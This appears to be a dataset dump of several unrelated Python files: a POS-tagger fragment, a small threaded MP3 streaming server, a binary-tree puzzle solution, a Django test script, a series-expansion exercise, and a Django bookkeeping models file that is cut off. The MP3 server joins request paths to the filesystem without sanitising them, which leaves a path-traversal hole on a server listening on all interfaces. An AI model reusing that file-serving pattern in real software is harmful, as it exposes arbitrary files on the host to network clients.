counts = {}\n for _, tag in data:\n try:\n counts[tag] += 1\n except KeyError:\n counts[tag] = 1\n return counts\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"portfolio1/pos_tagger.py","file_name":"pos_tagger.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"398038662","text":"import time\nimport os\nimport sys\nimport glob\nimport socket\nfrom urllib.parse import unquote\nfrom http.server import HTTPServer\nfrom socketserver import ThreadingMixIn\nfrom http.server import BaseHTTPRequestHandler\n\n\nHOST_NAME = '0.0.0.0'\nPORT_NUMBER = 4444\n\n\ndef get_ip_port():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('10.255.255.255', 1))\n IP = \"Open this link in other computers http://%s:%s\" % (s.getsockname()[0], PORT_NUMBER)\n print(IP)\n return True\n except:\n IP = \"\"\"Can't find your local IP address.\\nUse 'ipconfig' and 'ifconfig' commands in windows and linux, respectively.\\nYour local address is something like 192.168.1.105 or 172.16.1.101.\\nAfter finding IP open this link in browser:\\nhttp://ip_address:%s\\nwhere ip_address is your local IP address.\"\"\" % PORT_NUMBER\n print(IP)\n return False\n finally:\n s.close()\n\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n pass\n\n\nclass Server(BaseHTTPRequestHandler):\n\n def do_GET(self):\n if self.path == '/':\n self.handle_index()\n elif self.path.startswith('/static'):\n self.handle_static()\n elif self.path.startswith(fake_path):\n name = self.path[self.path.rindex('/')+1:]\n self.handle_music(unquote(name))\n elif self.path == '/favicon.ico':\n self.handle_favicon()\n\n def handle_favicon(self):\n file_path = 'favicon.ico'\n self.send_response(200)\n self.send_header('Content-type', 'image/vnd.microsoft.icon')\n self.send_header('Content-length', str(os.path.getsize(file_path)))\n self.end_headers()\n\n with open(file_path, 'rb', buffering=0) as file:\n self.wfile.write(file.read())\n\n def handle_music(self, file_name):\n file_path = \"%s/%s\" % (real_path, file_name)\n self.send_response(200)\n self.send_header('Content-type', 'audio/mpeg')\n self.send_header('Content-length', str(os.path.getsize(file_path)))\n self.end_headers()\n\n with open(file_path, 'rb', buffering=-1) as file:\n self.wfile.write(file.read())\n\n def handle_static(self):\n file_path = \"./\"+self.path\n self.send_response(200)\n if self.path.endswith('css'):\n self.send_header('Content-type', 'text/css')\n elif self.path.endswith('js'):\n self.send_header('Content-type', 'text/javascript')\n else:\n self.send_header('Content-type', 'font/woff2')\n self.send_header('Content-length', str(os.path.getsize(file_path)))\n\n self.end_headers()\n\n with open(file_path, 'rb') as file:\n self.wfile.write(bytes(file.read()))\n\n def handle_index(self):\n files = glob.glob1(real_path, \"*.mp3\")\n template = '{{\"title\": \"{1}\", \"file\": \"{0}\"}},'\n result = \"\"\n for file_name in files:\n result += template.format(\"%s/%s\" % (fake_path, file_name), file_name)\n\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open('index.html') as index:\n content = index.read().replace('FILES', result)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n def log_message(self, format, *args):\n return\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('usage: server.py /path/to/mp3/folder')\n exit(-1)\n\n real_path = sys.argv[1]\n fake_path = '/mp3'\n\n httpd = ThreadedHTTPServer((HOST_NAME, PORT_NUMBER), Server)\n try:\n print('Listening to http://%s:%s' % (HOST_NAME, PORT_NUMBER))\n if not get_ip_port():\n exit(-1)\n httpd.serve_forever()\n except KeyboardInterrupt:\n print('\\nShutting down server...')\n finally:\n httpd.server_close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"562869809","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def widthOfBinaryTree(self, root: TreeNode) -> int:\n import collections\n memo=collections.defaultdict(list)\n def search(node,i,p):\n if not node:\n return\n memo[i].append(p)\n search(node.left,i+1,2*p)\n search(node.right,i+1,2*p+1)\n search(root,0,0)\n ans=0\n for item in memo:\n temp=memo[item]\n ans=max(ans,temp[-1]-temp[0]+1)\n return ans\n","sub_path":"662.py","file_name":"662.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"62101855","text":"import os\nimport sys\nimport django\n\n\ndef main():\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoproject.settings')\n django.get_version()\n django.setup()\n from Weblog.models import OpinionPoll, Entry, QueryLogger\n print(Entry.objects.using('default').get(pk=1))\n ql = QueryLogger()\n from django.db import connection\n with connection.execute_wrapper(ql):\n e = Entry.objects.get(pk=1)\n print(e)\n print(ql.queries)\n\n from django.shortcuts import get_list_or_404\n # 返回一个列表而不是querySet对象\n entry1 = get_list_or_404(Entry.objects, pk=1)\n print(entry1)\n\n # print(OpinionPoll.opinionpoll_objects.select_to_db(id=1))\nif __name__ == '__main__':\n main()\n","sub_path":"tt01.py","file_name":"tt01.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"511344109","text":"\"\"\"\nThe Maclaurin series expansion for 1/(1-x) on an interval from -1 < x < 1 is as follows:\n\nWrite Python code which asks for input of a value of x on the interval -1 < x < 1, \nand which computes an approximation to 1/(1-x) using the using the series expansion\nsummation. The summation should be continued until the term to be added to the\nsummation is less than 10^-6 in absolute value. Hint: Note that each term in the\nseries is x raised to a power, including the 1 and x terms: x^0=1 and x^1=x\n\"\"\"\nfrom math import fabs \n\nx = float(input(\"Give me an x value so that -1 < x < 1: \"))\n\nsum = 0\nn = 0\nwhile (fabs(x ** n)) > (10 ** (-6)):\n\tsum += x ** n\n\tn += 1\n\nprint(\"The Maclaurin series expansion for 1/(1-x) where x = \" + str(x) + \" is: \" + str(sum))\n","sub_path":"Midterm_Prep/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"68221497","text":"\"\"\"Models for the FINANCE app\n\nThe finance app allows entering and viewing journal entries.\nThe journal entries link accounts.\nThe views represent the standard accounting views.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.db import models, transaction\nfrom django.db.models import Q\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom doubenfi.utils import *\nfrom doubenfi import conscribo\nfrom doubenfi.settings import APP_PREFIX\nfrom doubenfi.finance.excel import import_excel_2017, import_data_file\n# import doubenfi.finance.excel\nimport sys\nimport copy\nimport json\nimport os\n\nMAX_TEXT_LEN = 200\n\nBALANCE_TYPE = \"balance.type\" # One of the four possible balance types\nBALANCE_SIDE = \"balance.side\" # Either activa or passiva side\nEXPENSE_TYPE = \"expense.type\" # Either bijschrijving or afschrijving\nENTRY_SIDE = \"transaction.side\" # Debet or credit\n\n# ============================= LOCAL CLASSES ======================================\nerrHandle = ErrHandle()\n\nclass FieldChoice(models.Model):\n\n field = models.CharField(max_length=50)\n english_name = models.CharField(max_length=100)\n dutch_name = models.CharField(max_length=100)\n abbr = models.CharField(max_length=20, default='-')\n machine_value = models.IntegerField(help_text=\"The actual numeric value stored in the database. Created automatically.\")\n\n def __str__(self):\n return \"{}: {}, {} ({})\".format(\n self.field, self.english_name, self.dutch_name, str(self.machine_value))\n\n class Meta:\n ordering = ['field','machine_value']\n\ndef build_choice_list(field, position=None, subcat=None, maybe_empty=False):\n \"\"\"Create a list of choice-tuples\"\"\"\n\n choice_list = [];\n unique_list = []; # Check for uniqueness\n\n try:\n # check if there are any options at all\n if FieldChoice.objects == None:\n # Take a default list\n choice_list = [('0','-'),('1','N/A')]\n unique_list = [('0','-'),('1','N/A')]\n else:\n if maybe_empty:\n choice_list = [('0','-')]\n for choice in FieldChoice.objects.filter(field__iexact=field):\n # Default\n sEngName = \"\"\n # Any special position??\n if position==None:\n sEngName = choice.english_name\n elif position=='before':\n # We only need to take into account anything before a \":\" sign\n sEngName = choice.english_name.split(':',1)[0]\n elif position=='after':\n if subcat!=None:\n arName = choice.english_name.partition(':')\n if len(arName)>1 and arName[0]==subcat:\n sEngName = arName[2]\n\n # Sanity check\n if sEngName != \"\" and not sEngName in unique_list:\n # Add it to the REAL list\n choice_list.append((str(choice.machine_value),sEngName));\n # Add it to the list that checks for uniqueness\n unique_list.append(sEngName)\n\n choice_list = sorted(choice_list,key=lambda x: x[1]);\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n choice_list = [('0','-'),('1','N/A')];\n\n # Signbank returns: [('0','-'),('1','N/A')] + choice_list\n # We do not use defaults\n return choice_list;\n\ndef build_abbr_list(field, position=None, subcat=None, maybe_empty=False):\n \"\"\"Create a list of choice-tuples\"\"\"\n\n choice_list = [];\n unique_list = []; # Check for uniqueness\n\n try:\n # check if there are any options at all\n if FieldChoice.objects == None:\n # Take a default list\n choice_list = [('0','-'),('1','N/A')]\n unique_list = [('0','-'),('1','N/A')]\n else:\n if maybe_empty:\n choice_list = [('0','-')]\n for choice in FieldChoice.objects.filter(field__iexact=field):\n # Default\n sEngName = \"\"\n # Any special position??\n if position==None:\n sEngName = choice.english_name\n elif position=='before':\n # We only need to take into account anything before a \":\" sign\n sEngName = choice.english_name.split(':',1)[0]\n elif position=='after':\n if subcat!=None:\n arName = choice.english_name.partition(':')\n if len(arName)>1 and arName[0]==subcat:\n sEngName = arName[2]\n\n # Sanity check\n if sEngName != \"\" and not sEngName in unique_list:\n # Add it to the REAL list\n choice_list.append((str(choice.abbr),sEngName));\n # Add it to the list that checks for uniqueness\n unique_list.append(sEngName)\n\n choice_list = sorted(choice_list,key=lambda x: x[1]);\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n choice_list = [('0','-'),('1','N/A')];\n\n # Signbank returns: [('0','-'),('1','N/A')] + choice_list\n # We do not use defaults\n return choice_list;\n\ndef choice_english(field, num):\n \"\"\"Get the english name of the field with the indicated machine_number\"\"\"\n\n try:\n result_list = FieldChoice.objects.filter(field__iexact=field).filter(machine_value=num)\n if (result_list == None):\n return \"(No results for \"+field+\" with number=\"+num\n return result_list[0].english_name\n except:\n return \"(empty)\"\n\ndef choice_value(field, term):\n \"\"\"Get the numerical value of the field with the indicated English name\"\"\"\n\n try:\n result_list = FieldChoice.objects.filter(field__iexact=field).filter(english_name__iexact=term)\n if result_list == None:\n # Try looking at abbreviation\n result_list = FieldChoice.objects.filter(field__iexact=field).filter(abbr__iexact=term)\n if result_list == None:\n return -1\n else:\n return result_list[0].machine_value\n except:\n return -1\n\ndef choice_abbreviation(field, num):\n \"\"\"Get the abbreviation of the field with the indicated machine_number\"\"\"\n\n try:\n result_list = FieldChoice.objects.filter(field__iexact=field).filter(machine_value=num)\n if (result_list == None):\n return \"{}_{}\".format(field, num)\n return result_list[0].abbr\n except:\n return \"-\"\n\n\n\n# ============================= MODEL CLASSES ======================================\n\n\nclass Vault(models.Model):\n \"\"\"Store username/password combinations, e.g. for Conscribo\"\"\"\n\n # [1] username\n username = models.CharField(\"Gebruiker\", max_length=MAX_TEXT_LEN)\n # [1] password\n password = models.CharField(\"Wachtwoord\", max_length=MAX_TEXT_LEN)\n # [1] name of the service\n servicename = models.CharField(\"Service\", max_length=MAX_TEXT_LEN)\n # [0-1] API address\n url = models.URLField(\"API url\", blank=True,null=True)\n\n def __str__(self):\n return self.servicename\n\n def get_session_id(self):\n oBack = {'status': 'starting', 'msg': ''}\n if self.servicename.lower() == \"conscribo\" and self.url != None and \"conscribo\" in self.url:\n # Return a session-id request object\n oBack = conscribo.get_session_id(self)\n return oBack\n\n def repair_ong_2017(self, project, session_id):\n \"\"\"Repair ONG 2017\"\"\"\n\n response = {'status': 'error', 'msg': ''}\n oErr = ErrHandle()\n oCount = {'info': '', 'id': '', 'missed': []}\n try:\n count = 0\n missed_list = []\n # Get the ONG account\n ong = project.accounts.filter(number=1210).first()\n # Get a list of all the transactions (expenses) of the ONG\n qs_ong = project.transactions.filter(credit=ong)\n num = qs_ong.count()\n # Walk all the transactions\n for transaction in qs_ong:\n # Prepare: get this transaction from Conscribo\n oTrans = conscribo.repair_ong_expense(self, transaction, session_id)\n if oTrans['status'] == \"ok\":\n # Keep track\n count +=1\n oErr.Status(\"Okay for {} of {}\".format(count, num))\n else:\n # COuld not find this transaction\n missed_list.append(transaction.id)\n\n # Show what we have done:\n oMsg = \"Er zijn {} ONG transacties gecorrigeerd voor dit project\".format(count)\n if len(missed_list)>0:\n oMsg += \"

Gemiste transacties:

\"\n for item in missed_list:\n oMsg += \"
{} - [{}] {}\".format(item.date, item.doc, item.amount) \n response['msg'] = oMsg\n except:\n response['msg'] = oErr.get_error_message()\n return response\n\n\n def sync_persons(self, project, session_id, oStatus, sync_type=\"update\"):\n \"\"\"Try synchronise persons in [project] using the given session id\"\"\"\n\n response = {'status': 'error', 'msg': ''}\n oErr = ErrHandle()\n oCount = {'info': '', 'id': ''}\n transrownum = 1\n\n try:\n # Get a list of new persons\n person_list = project.org.persons.filter(sync='false').order_by('id')\n total = person_list.count()\n\n # If no synchronisation is needed, then we're okay\n if total == 0:\n response['status'] = 'ok'\n else:\n if self.servicename.lower() == \"conscribo\" and self.url != None and \"conscribo\" in self.url:\n # Get a list of persons currently in Conscribo\n oListResponse = conscribo.list_person(self, session_id)\n if 'relations' in oListResponse:\n # We now have a list of persons already in Conscribo\n conscribo_list = oListResponse['relations']\n # Walk all new persons in this project\n count = 0\n # Walk all persons that have not been added yet\n for person in person_list:\n # Double check to see this person is not in conscribo_list\n sIban = person.iban\n lMatches = [v for k,v in conscribo_list.items() if v['rekening']['iban'] == sIban]\n if len(lMatches) == 0:\n oCount['info'] = 'Adding person'\n oCount['id'] = person.id\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n # Try synchronizing this person\n code = str(person.id)\n oPers = conscribo.sync_person(self, person, code, session_id)\n if oPers['status'] == 'ok':\n # Also set the person sync status here to 'true'\n person.sync = 'true'\n person.save()\n # Keep track of progress\n count += 1\n else:\n # There has been an error\n oCount['info'] = 'Error in person'\n oCount['name'] = \"{}: {}\".format(person.name, person.iban)\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n else:\n # The person is already known in Conscribo: set the status to okay\n person.sync = \"true\"\n person.save()\n # Finish off nicely\n response['status'] = 'ok'\n response['msg'] = 'From the {} persons, {} have been synchronized'.format(total, count)\n else:\n response['msg'] = \"could not get a list with relations from Conscribo\"\n\n else:\n\n response['msg'] = 'this project has no synchronisation defined in the Vault'\n except:\n response['msg'] = oErr.get_error_message()\n return response\n\n\n def sync_transactions(self, project, session_id, oStatus, sync_type=\"update\"):\n \"\"\"Try synchronise transactions in [project] using the given session id\"\"\"\n\n response = {'status': 'error', 'msg': ''}\n oErr = ErrHandle()\n oCount = {'info': '', 'id': ''}\n transrownum = 1\n try:\n if self.servicename.lower() == \"conscribo\" and self.url != None and \"conscribo\" in self.url:\n\n # First try to synchronize the persons\n oRelationsResponse = self.sync_persons(project, session_id, oStatus, sync_type)\n if oRelationsResponse == None or not 'status' in oRelationsResponse or oRelationsResponse['status'] != 'ok':\n # Something has gone wrong\n if 'msg' in oRelationsResponse:\n response['msg'] = oRelationsResponse['msg']\n return response\n\n # Walk all transactions in this project\n count = 0\n total = 0\n # Get a list of all group numbers in the transactions for this project\n group_list = []\n group = 0\n\n # Determine which transactions to synchronize\n if sync_type == \"all\" or sync_type == \"journal\":\n trans_list = project.transactions.all().order_by('group')\n else:\n trans_list = project.transactions.filter(sync='false').order_by('group')\n\n # Divide the transactions into groups\n for transaction in trans_list:\n # every transaction must have a group, so if this one doesn't, make sure it gets one\n if transaction.group == None:\n transaction.group = transaction.id\n transaction.save()\n if transaction.group != group:\n group = transaction.group\n group_list.append(group)\n oCount['info'] = 'Divided transactions into groups'\n oStatus.set(\"groups\", oCount=oCount)\n # Now visit all groups\n for group in group_list:\n oCount['info'] = 'Handling group'\n oCount['id'] = group\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n # Get the transactions in this group\n trans_list = project.transactions.filter(group=group)\n total += len(trans_list)\n # Try synchronizing this transaction\n oTrans = conscribo.sync_transaction(self, trans_list, session_id, transrownum)\n if oTrans['status'] == 'ok' and 'transrownum' in oTrans:\n count += 1\n transrownum = oTrans['transrownum']\n else:\n # There has been an error\n oCount['info'] = 'Error in group'\n oCount['id'] = group\n oCount['count'] = count+1\n oStatus.set(\"group\", oCount=oCount)\n # Finish off nicely\n oStatus.set(\"finished\", oCount=oCount)\n response['status'] = 'ok'\n response['msg'] = 'From the {} transactions, {} have been synchronized'.format(total, count)\n else:\n response['msg'] = 'this project has no synchronisation set'\n except:\n response['msg'] = oErr.get_error_message()\n return response\n\n\nclass Organization(models.Model):\n \"\"\"Information on the organization for whom the accounting is\"\"\"\n\n # [1] Obligatory organization name\n name = models.CharField(\"Organization's name\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [0-1] Optional address lines\n streetname = models.TextField(\"Street name\", blank=True, null=True)\n streetnumber = models.TextField(\"Number\", blank=True, null=True)\n zipcode = models.TextField(\"Zip code\", blank=True, null=True)\n city = models.TextField(\"City\", blank=True, null=True)\n email = models.EmailField(\"E-mail address\", blank=True, null=True)\n phone = models.TextField(\"Phone number\", blank=True, null=True)\n\n\nclass Project(models.Model):\n \"\"\"Information on the organization for whom the accounting is\"\"\"\n\n # [1] Obligatory organization Link\n org = models.ForeignKey(Organization)\n # [1] Obligatory bookkeeping year\n year = models.IntegerField(\"Bookkeeping year\", blank=False, null=False)\n # [0-1] Excel import file used (if any)\n source = models.TextField(\"Excel source file\", blank=True, null=True)\n # [0-1] Excel export file used\n target = models.TextField(\"Excel target file\", blank=True, null=True)\n # [0-1] A project can have a vault for synchronization\n vault = models.ForeignKey(Vault, blank=True, null=True)\n\n def __str__(self):\n return \"{}_{}\".format(self.org.name, self.year)\n\n def short(self):\n return \"{}_{}\".format(self.org.name, self.year)\n\n def get_balance_type(self, sType):\n type_number = choice_value(BALANCE_TYPE, sType)\n return type_number\n\n def get_absolute_url(self):\n return reverse('project_detail', kwargs={'pk': self.pk})\n\n def get_project(sOrgName, iYear):\n # Get the organization\n org = Organization.objects.filter(name=sOrgName).first()\n if org == None:\n return None\n prj = Project.objects.filter(org=org, year=iYear).first()\n return prj\n\n def clean_transactions(self, num=None, side=None):\n \"\"\"Remove all the transactions of this project\"\"\"\n\n if num==None and side==None:\n qs = self.transactions.all()\n elif num!=None and side != None:\n account = self.accounts.filter(number=num).first()\n if side == 'debet':\n qs = self.transactions.filter(project=self, debet=account)\n elif side == 'credit':\n qs = self.transactions.filter(project=self, credit=account)\n qs.delete()\n # Return positively\n return True\n\n def clean_persons(self):\n \"\"\"Remove all the transactions of this project\"\"\"\n\n qs = Person.objects.filter(project=self)\n qs.delete()\n # Return positively\n return True\n\n def add_transgroup(self, doc=\"\", date=None, description=\"\", batch=\"\"):\n\n oErr = ErrHandle()\n tgroup = None\n groupnum = 0\n try:\n # Validate the required parameters\n if date == None:\n return None\n\n # Create one\n tgroup = TransGroup(project=self, date=date, description=description,\n doc=doc, group=groupnum, batch=batch)\n tgroup.save()\n # Return the tgroup object\n return tgroup\n except:\n sMsg = oErr.get_error_message()\n return None\n\n def add_transaction(self, debet=None, credit=None, \n batch=\"\", tgroup=None, amount=0.0, person=None, local=0.0, \n rate=1.0, valuta=\"EUR\", extra=\"{}\"):\n \"\"\"Add one transaction with optional parameters\"\"\"\n\n oErr = ErrHandle()\n lSide = ['db', 'cr']\n try:\n # Validate the required parameters\n if tgroup == None or (debet == None and credit == None) or (amount == 0.0 and local == 0.0):\n return None\n\n # CHeck if valuta conversion is needed\n if local == 0.0 and amount != 0.0:\n local = amount\n elif local != 0.0 and amount == 0.0:\n # NOTE: divide by rate (e.g. CFA 3.400.500 / 655 = EUR 5191,60)\n amount = local / rate\n\n # Create two transactions: one for debet, one for credit\n for side in lSide:\n account = debet if side == \"db\" else credit\n transaction = Transaction(project=self, tgroup=tgroup, sync=\"false\",\n account=account, side=side, amount=amount, \n local=local, rate=rate, valuta=valuta,\n extra=extra, person=person)\n # Save it\n transaction.save()\n\n # Possibly add default group\n if tgroup.group == 0:\n tgroup.group = transaction.id\n tgroup.save()\n # And return the created transaction\n return transaction\n except:\n sMsg = oErr.get_error_message()\n return None\n\n def read_from_excel(self, sFileName, arErr, sType=\"\", sSoort=\"\"):\n response = False\n # Action depends on the type\n if sType == \"2017\":\n response = import_excel_2017(self, sFileName, sSoort, arErr)\n \n return response\n\n def read_data(self, data_file, arErr, sSoort):\n \"\"\"Read the data from [data_file] of type [sSoort] into project [self]\"\"\"\n\n oBack = import_data_file(self, data_file, sSoort, arErr)\n return oBack \n\n def copy_account(self, acct_prev):\n \"\"\"Copy the previous account to a new one\"\"\"\n\n # Validate\n if acct_prev == None: return False\n # Check purpose\n purp_prev = acct_prev.purpose\n purp = self.purposes.filter(name=purp_prev.name).first()\n if purp == None and purp_prev != None:\n purp = Purpose(project=self, name=purp_prev.name,\n code=purp_prev.code, exp_line=purp_prev.exp_line,\n descr=purp_prev.descr)\n purp.save()\n # Create a new account\n acct_new = Account(project=self, name=acct_prev.name, number=acct_prev.number,\n descr=acct_prev.descr, purpose=purp, \n balance=acct_prev.balance, saldo=0.0)\n # Optional additions\n if acct_prev.reservering != \"\" and acct_prev.reservering != None:\n acct_new.reservering = acct_prev.reservering\n if acct_prev.balline != \"\" and acct_prev.balline != None:\n acct_new.balline = acct_prev.balline\n # Save it\n result = acct_new.save()\n # Return this\n return acct_new\n\n def get_preceding(self):\n \"\"\"Get project from the preceding year\"\"\"\n iYear = int(self.year)\n prec_year = iYear-1\n prec = Project.objects.filter(org=self.org, year=prec_year).first()\n return prec\n\n def get_account(self, number):\n \"\"\"Get (and possibly create) the account with the indicated number\"\"\"\n\n account = self.accounts.filter(number=number).first()\n if account == None: \n # Check if there is a project from the previous year\n prec_prj = self.get_preceding()\n if prec_prj == None:\n return None\n # Try copy the account from the previous year\n prev_acct = prec_prj.accounts.filter(number=number).first()\n if prev_acct == None:\n return None\n account = self.copy_account(prev_acct)\n # Return the result\n return account\n\n def get_account_iban(self, iban):\n \"\"\"Get (and possibly copy from previous year) the account with the indicated IBAN\"\"\"\n\n account = self.accounts.filter(iban=iban).first()\n if account == None: \n # Check if there is a project from the previous year\n prec_prj = self.get_preceding()\n if prec_prj == None:\n return None\n # Try copy the account from the previous year\n prev_acct = prec_prj.accounts.filter(iban=iban).first()\n if prev_acct == None:\n return None\n account = self.copy_account(prev_acct)\n # Return the result\n return account\n\n def get_person(self,sPerson, sIban):\n \"\"\"Retrieve this person\"\"\"\n\n # ONLY look at the IBAN to get a person\n person = self.org.persons.filter(iban=sIban).first()\n if person == None:\n # Check if this is a known account \n account = self.accounts.filter(iban=sIban).first()\n if account != None:\n sPerson = account.name\n # Add this one TO THE ORGANISZTION\n person = Person(name=sPerson, \n iban=sIban, \n org=self.org,\n sync='false')\n person.save()\n return person\n\n def get_purpose_list(self):\n purpose_ids = [item.purpose.id for item in self.accounts.all()]\n purpose_list = Purpose.objects.filter(id__in=purpose_ids).order_by(\"name\")\n return purpose_list\n\n\nclass Personal(models.Model):\n \"\"\"Details of currently active user\"\"\" \n\n # [1] THere has to be a user, that is the basis\n user = models.ForeignKey(User, blank=False, null=False)\n # [0-1] Each user should have chosen his 'current' project\n project = models.ForeignKey(Project, blank=True, null=True)\n\n def __str__(self):\n # REturn my unique identification: username, organisation and year\n return \"{}_{}_{}\".format(self.user.username, self.org.name, self.year)\n\n\nclass Purpose(models.Model):\n \"\"\"The purpose of income or expense\"\"\"\n\n # [1] Each purpose must have a name\n name = models.CharField(\"Name\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [1] Each purpose must have a code string\n code = models.CharField(\"leadCode\", max_length=MAX_TEXT_LEN, blank=False, null=False, default=\"00\")\n # [1] Each account takes a place in the expense overview\n exp_line = models.IntegerField(\"Expense line\", default=-1)\n # [0-1] Description\n descr = models.TextField(\"Description\", blank=True, default=\"\")\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='purposes')\n\n def __str__(self):\n return \"{}-{}: {}\".format(self.project.org.name, self.project.year, self.name)\n\n\nclass BalLine(models.Model):\n \"\"\"Line within the Balance\"\"\"\n\n # [1] Each line must have a name\n name = models.CharField(\"Name\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [1] Order of this line in the balance\n order = models.IntegerField(\"Order\", default=0)\n # [1] Is this line in the 'activa' or the 'passiva' section?\n side = models.CharField(\"Balanszijde\", choices=build_choice_list(BALANCE_SIDE), \n max_length=5, default=0)\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='ballines')\n\n def __str__(self):\n return self.name\n\n\nclass Account(models.Model):\n \"\"\"One account in bookkeeping terms\"\"\"\n\n # [1] Each account must have a name and a number\n name = models.CharField(\"Naam\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n number = models.IntegerField(\"Nummer\", default = 500)\n # [0-1] Account under which this one resides (if any)\n parent = models.ForeignKey(\"Account\", blank=True, null=True, related_name='parent_account')\n # [0-1] Physical accounts may have an IBAN\n iban = models.CharField(\"IBAN\", max_length=MAX_TEXT_LEN, blank=True, null=True)\n # [1; o] Description in plain text of this account\n descr = models.TextField(\"Beschrijving\", blank=False, null=False)\n # [1] Obligatory specific-purpose (but the value can be \"none\")\n purpose = models.ForeignKey(Purpose, verbose_name=\"Doelstelling specifiek\", blank=False, null=False, related_name=\"specificpurpose\")\n # [0-1] Nummer van de reserveringsregel onder welke dit account hoort\n reservering = models.IntegerField(\"Reserveringsnummer\", blank=True, null=True)\n # [0-1] If this is Income/Expense: line for this account in the Liabilities section\n balline = models.ForeignKey(BalLine, verbose_name=\"Balansregel\", blank=True, null=True)\n # [1] Obligatory balance position: Activa, Passiva, Lasten, Baten\n balance = models.CharField(\"Balansonderdeel\", choices=build_choice_list(BALANCE_TYPE), \n max_length=5, default=0)\n # [1] Each account (for a project) has a starting saldo\n saldo = models.FloatField(\"Beginsaldo\", default=0.0)\n # [1] Obligatory side of the saldo\n saldoside = models.CharField(\"Debet or credit\", choices=build_abbr_list(ENTRY_SIDE), max_length=5, default='db')\n # [1] Obligatory boolean: use for expenses\n useforexp = models.BooleanField(\"Gebruiken bij uitgaven\", default=True)\n # [1] Obligatory boolean: use for income\n useforinc = models.BooleanField(\"Gebruiken bij inkomsten\", default=True)\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='accounts')\n\n def __str__(self):\n return \"{}\".format(self.number)\n\n def parent_in(self):\n sFull = \"\"\n if self.parent != None:\n sFull = \"{}: {}\".format(self.parent.number, self.parent.name)\n return sFull\n\n def get_acctp(self):\n \"\"\"Calculate the accounttype as intended for auditfile 3.2\"\"\"\n accTp = \"\"\n # Get the current balance type\n sBalance = choice_abbreviation(BALANCE_TYPE, self.balance)\n if sBalance == \"act\" or sBalance == \"pas\":\n # Activa or Passiva --> B\n accTp = \"B\"\n elif sBalance == \"bat\" or sBalance == \"las\":\n # Baten or Lasten --> P (=profite/loss)\n accTp = \"P\"\n else:\n # Mixed\n accTP = \"M\"\n\n return accTp\n\n def group(self):\n g = str(self.number) if self.parent == None else str(self.parent.number)\n return g\n\n def full_path(self):\n \"\"\"Provide the full path including my own number\"\"\"\n\n oErr = ErrHandle()\n path = \"\"\n history = [] # Note all accounts we have had\n try:\n history.append(self.number)\n item = self.parent\n while item != None and item.number not in history:\n history.append(item.number)\n path = \"/\" + str(item.number) + path\n item = item.parent\n # Add the name itself to the path\n path = path + \"/\" + str(self.number)\n path = path.lower()\n except:\n msg = oErr.get_error_message()\n path = \"\"\n return path\n\n def group_parent(self):\n \"\"\"Get the parent of the group I belong to \"\"\"\n if self.parent == None or self.parent.parent == None:\n return None\n else:\n return self.parent.parent.number\n\n def group_depth(self):\n \"\"\"Get the amount of parents above me\"\"\"\n\n depth = 0\n item = self.parent\n history = [] # Note all accounts we have had\n while item != None and item.number not in history:\n history.append(item.number)\n depth += 1\n item = item.parent\n # Return the depth we found\n return depth\n\n def group_path(self):\n \"\"\"Return the path above me\"\"\"\n\n path = \"\"\n oErr = ErrHandle()\n history = [] # Note all accounts we have had\n try:\n history.append(self.number)\n item = self.parent\n while item != None and item.number not in history:\n history.append(item.number)\n path = \"/\" + str(item.number) + path\n item = item.parent\n path = path.lower()\n except:\n msg = oErr.get_error_message()\n path = \"\"\n return path\n\n def has_children(self):\n fchild = self.project.accounts.filter(parent=self).first()\n return fchild != None\n \n\nclass Person(models.Model):\n \"\"\"Sponsor or other person that can be associated with a transaction\"\"\"\n\n # [1] Each person must have a name and an IBAN\n name = models.CharField(\"Naam\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n iban = models.CharField(\"IBAN\", max_length=MAX_TEXT_LEN, blank=False, null=False)\n # [1] Any notes associated with this person\n notes = models.TextField(\"Opmerkingen\", blank=True, default=\"\")\n # [1] Obligatory synchronisation status\n sync = models.CharField(\"Sync status\", max_length=20, default=\"true\")\n # [1] Obligatory link to an organization\n org = models.ForeignKey(Organization, blank=False, null=False, related_name='persons')\n\n def __str__(self):\n return \"{}\".format(self.name)\n\n\nclass TransGroup(models.Model):\n \"\"\"A group of transactions that together amount to zero\"\"\"\n\n # [1] Documentation string or number\n doc = models.TextField(\"Documentation\", blank=True, default=\"\")\n # [0-1] Group number: all transactions with the same number belong together and must together be 0\n group = 